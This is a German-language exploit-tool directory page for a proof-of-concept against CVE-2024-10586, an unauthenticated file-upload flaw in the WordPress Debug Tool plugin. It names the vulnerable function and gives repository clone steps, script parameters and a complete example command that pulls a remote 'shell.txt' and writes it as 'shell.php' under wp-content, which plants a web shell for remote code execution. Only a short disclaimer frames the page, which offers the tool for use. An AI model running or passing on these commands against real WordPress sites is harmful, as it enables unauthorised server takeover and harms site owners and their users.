Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-10586-Poc — Proof-of-Concept-Exploit für CVE-2024-10586, das das WordPress-Plugin Debug Tool angreift. Automatisiert den Upload beliebiger Dateien, der über nicht authentifizierte POST-Anfragen zu Remote Code Execution führt. | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-10586-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2024-10586-poc

CVE-2024-10586-Poc

Proof-of-Concept-Exploit für CVE-2024-10586, das das WordPress-Plugin Debug Tool angreift. Automatisiert den Upload beliebiger Dateien, der über nicht authentifizierte POST-Anfragen zu Remote Code Execution führt.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
10vor 1 JahrNoch nicht geprüft
Teilen

Schwachstelleninformationen

Beschreibung Das Debug-Tool-Plugin für WordPress ist in allen Versionen bis einschließlich 2.2 anfällig für die Erstellung beliebiger Dateien, da in der Funktion dbt_pull_image() eine Berechtigungsprüfung und eine Dateitypvalidierung fehlen.
Dadurch ist es nicht authentifizierten Angreifern möglich, beliebige Dateien wie .php-Dateien zu erstellen, die für die Remote-Codeausführung ausgenutzt werden können.

CVE ID

CVE-2024-10586

Verwendung des Skripts

Voraussetzungen

  • Python 3.x muss auf Ihrem System installiert sein.
  • Installieren Sie die erforderlichen Abhängigkeiten: pip install requests

Ausführung

  1. Klonen Sie das Repository von GitHub:
root@kitploit:~
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
  1. Führen Sie das Skript mit dem folgenden Befehl aus: python CVE-2024-10586.py -u -r -p

    Parameter

  • -u, --url: Die Basis-URL der WordPress-Website (z. B. http://example.com/wordpress).
  • -r, --remote: Die URL der entfernten Datei, die als Payload-Quelle verwendet werden soll.
  • -p, --path: Optional. Der Pfad, unter dem die Shell gespeichert wird. Standard ist /opt/lampp/htdocs/wordpress/wp-content/Nxploit.php.

Beispielbefehl

root@kitploit:~
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php

Beispielverwendung

root@kitploit:~
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php

usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]

Send a POST request to WordPress admin-ajax.php.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     The base URL of the WordPress site.
  -r REMOTE, --remote REMOTE
                        The remote URL to use in the 'source' parameter.
  -p PATH, --path PATH  The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.

Haftungsausschluss

Dieses Skript dient nur zu Bildungszwecken. Verwenden Sie es verantwortungsvoll und ausschließlich auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung zum Testen haben. Die Autoren sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Tool herunterladen